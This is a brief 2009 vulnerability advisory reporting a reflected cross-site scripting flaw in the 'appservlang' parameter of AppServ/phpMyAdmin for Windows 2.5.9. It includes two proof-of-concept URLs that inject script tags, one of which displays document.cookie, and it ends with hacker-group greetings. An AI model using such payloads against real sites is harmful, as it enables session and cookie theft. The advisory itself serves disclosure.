^ ~~~~~~~~~~~~~ Indonesia ~~~~~~~~~~^
^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~^
^~~~~~~~~~phpmyadmin for windows 2.5.9~~~~~~~~~^

Author 		: ghostblup
Date   		: 02-09-09
Location   	: Palembang, Indonesia
Blog 		: http://ghostblup.blogspot.com
Where 		: Cross-site scripting
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Intro


Cross-site scripting (XSS) is a type of computer security vulnerability
typically found in web applications which allow code injection by malicious web
and session/cookies stolen

Affected software description:
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Application : phpMyAdmin for Windows
version : 2.5.9

Vendor 		: http://www.appservnetwork.com/
Downlaod 	:  http://prdownloads.sourceforge.net/appserv/appserv-win32-2.5.9.exe?download

 --------------------------------------------------------------------------

Vulnerability:
~~~~~~~~~~~~~~
Critical Cross-site scripting (XSS).
appservlang variable in index.php is not in the filter that allows XSS
/ cross site scripting


Poc/Exploit:
 ~~~~~~~~~
http://localhost/index.php?appservlang=>"><ScRiPt%20%0a%0d>alert(112233)%3B</ScRiPt>
http://localhost/index.php?appservlang=>"><script>alert(document.cookie);</script>


 ---------------------------------------------------------------------------

Shoutz:
~~~~~
~ My Love  		: Ratih Permata Sari
~ My friends 		: Amy,suset,revi,uwix^_^, Blackgirl ,
jasakreativkomputer, cyberlau , Vldaz
~ My inspiration		: K-159 , y3dips,az001,Hero
~ ngetem community, sayap community , echo.or.id , PalComTech.com
~ #ngetem #mr_green #sayap #kegelapan @irc.allnetwork

 ---------------------------------------------------------------------------
Contact:
~~~~~~

ghostblup@gmail.com

My Blog: http://www.ghostblup.blogspot.com
~~~~~~~~~~~~~~~~~~~~~end~~~~~~~~~~~~~~